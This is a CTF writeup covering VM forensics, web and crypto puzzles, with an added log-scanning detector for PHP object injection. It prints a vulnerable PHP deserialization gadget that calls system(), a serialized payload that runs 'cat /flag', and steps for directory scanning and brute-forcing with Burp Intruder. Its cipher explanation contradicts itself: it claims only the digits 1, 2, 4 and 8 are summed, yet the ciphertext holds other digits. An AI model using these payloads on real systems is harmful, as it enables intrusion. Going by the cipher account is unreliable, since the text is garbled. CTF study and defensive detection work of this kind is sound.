PolarCTF 2025 Summer Challenge Writeup: Misc, Web, and Crypto Puzzles
Miscellaneous Challenges
Initial Access via Social Media
The first step involves following the official public account and sending a specific keyword to receive a token.
Virtual Machine Forensics
Import the provided .ovf file into virtualization software. Once the system boots, launch the Edge browser and examine its history. A previously unseen web application called Tinode appears, indicating the communication platform used. Its IP address is also visible in the history records.
- First flag component: Tinode
- Fourth flag component: 192.168.192.129
Next, inspect the files on the host. Configure File Explorer to show hidden files and file extensions. A directory named chat-master sits on the desktop, likely containing the source code for the chat platform. Within the Documents folder, a subdirectory called program contains a suspicious executable named NewWorld.exe.
- Second flag component: NewWorld.exe
Reviewing the file main.py reveals a self-described trojan script. The comment indicates it is a Python-based malicious tool.
- Third flag component: python
Further commentary within the script mentions processing cmd.exe, confirming this system binary was the target of encryption or manipulation.
- Fifth flag component: cmd.exe
Web Exploitation
Deserialization Chain
Source code analysis shows a vulnerable class A with a destructor that passes a user-controlled property to system() if set.
<?php
class A {
    public $cmd;
    function __destruct() {
        if (isset($this->cmd)) {
            system($this->cmd);
        }
    }
}
if (isset($_GET['data'])) {
    $data = $_GET['data'];
    @unserialize($data);
} else {
    highlight_file(__FILE__);
}
?>
Construct a serialized payload to run a command, then URL-encode the result and pass it via the data parameter.
<?php
class A {
    public $cmd = 'cat /flag';
}
echo urlencode(serialize(new A()));
?>
Execute this in any PHP sandbox and assign the output to the data parameter to retrieve the flag.
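From the defender's side, the same chain is easy to spot in web server logs: a serialized PHP object arriving in a query parameter is almost never legitimate traffic. The following Python script is an added example, not part of the original writeup. It builds one constructed request carrying the writeup's `data` payload (URL-encoded the same way PHP's urlencode() does), places it among constructed Apache-style access log lines, and reports any parameter containing an `O:<len>:"<class>":<n>:{...}` object, including the class name and its properties. The log format and IP addresses are assumptions for the sample.

```python
import re
from urllib.parse import urlsplit, parse_qs, urlencode

# Constructed sample: the writeup's payload for class A as serialize() emits it.
SERIALIZED_A = 'O:1:"A":1:{s:3:"cmd";s:9:"cat /flag";}'

# Constructed access-log lines (abbreviated Apache style); the second one carries
# the payload above in the `data` parameter, encoded like PHP's urlencode().
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [12/Jul/2025:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.7 - - [12/Jul/2025:10:01:09 +0000] "GET /index.php?'
    + urlencode({"data": SERIALIZED_A}) + ' HTTP/1.1" 200 77',
    '10.0.0.9 - - [12/Jul/2025:10:02:00 +0000] "GET /index.php?data=hello HTTP/1.1" 200 512',
])

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Start of a serialized PHP object: O:<class name length>:"<class>":<property count>:{
PHP_OBJECT_RE = re.compile(r'O:(\d+):"([^"]+)":(\d+):\{')
# A serialized PHP string token: s:<length>:"<bytes>";
PHP_STRING_RE = re.compile(r's:(\d+):"')


def php_strings(body):
    """Return the string tokens of a serialized PHP fragment in order.

    The declared length is honoured, so quotes inside a value do not confuse
    the tokenizer the way a naive regex on the closing quote would.
    """
    tokens = []
    pos = 0
    while True:
        m = PHP_STRING_RE.search(body, pos)
        if not m:
            return tokens
        start = m.end()
        end = start + int(m.group(1))
        tokens.append(body[start:end])
        pos = end


def find_serialized_objects(log_text):
    """Scan access-log lines and report query parameters carrying a PHP object.

    Each hit records the client address, the parameter name, the class being
    instantiated and its property name/value pairs, which is what an analyst
    needs to judge whether a gadget class (here: A with `cmd`) was targeted.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for param, values in parse_qs(query).items():
            for value in values:
                obj = PHP_OBJECT_RE.search(value)
                if not obj:
                    continue
                tokens = php_strings(value[obj.end():])
                hits.append({
                    "client": line.split()[0],
                    "param": param,
                    "class": obj.group(2),
                    "props": dict(zip(tokens[0::2], tokens[1::2])),
                })
    return hits


if __name__ == "__main__":
    for hit in find_serialized_objects(SAMPLE_LOG):
        print(f"{hit['client']} sent object {hit['class']} via {hit['param']}: {hit['props']}")
```

On the sample log this reports the single request from 10.0.0.7 instantiating class `A` with `cmd` set to `cat /flag`. The application-side fix is to stop calling unserialize() on request data at all (or at least pass `['allowed_classes' => false]`), which this detector complements rather than replaces.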
The Gate of Fate
Examining page source reveals a Base64 comment: 5pyJ5pe25YCZ77yM6aqM6K+B56CB5piv5ZCm5aW95L2/5LiN6YeN6KaB. Decoding it yields a hint that the verification code is not important, so a universal code 0000 bypasses it.
Run a directory scanner such as dirsearch against the target. Discover a password.txt dictionary file in the web root. Download its contents and use Burp Suite Intruder to brute-force the "Alpha" line, then repeat with a separate wordlist for the "Beta" line to retrieve the flag.
Command Execution Bypass
Initial testing shows that many characters and commands are blocked by a filter. Checking environment variables reveals a fake flag designed to mislead.
Using dirsearch uncovers a hidden endpoint. It hints at replacing characters in a path targeting flag.txt. The endpoint requests a parameter named XOR_KEY, with the challenge name "Polar" serving as the value. Return to the command execution interface, supply the parameter with the correct value, and obtain the real flag.
Cryptography
Cloud Shadow Cipher
This puzzle uses the "Cloud Shadow" cipher, also known as 01248 encoding. Groups of the digits 1, 2, 4 and 8 are added together to represent values 0-9 (with 0 itself written as 28, i.e. 2+8), and each sum maps to a letter (1 = A through 26 = Z). The digit 0 acts as the delimiter between groups.
raw = "5212081052120120885309853"
# The digit 0 separates letters; every other digit contributes to the sum.
parts = raw.split('0')
result_chars = []
for segment in parts:
    segment_sum = 0
    for ch in segment:
        segment_sum += int(ch)
    # 1 -> 'A' (ASCII 65), so add 64 to the sum
    result_chars.append(chr(segment_sum + 64))
plaintext = ''.join(result_chars)
print(plaintext)
Take the resulting decoded string, compute its MD5 hash, and wrap it in flag{} format.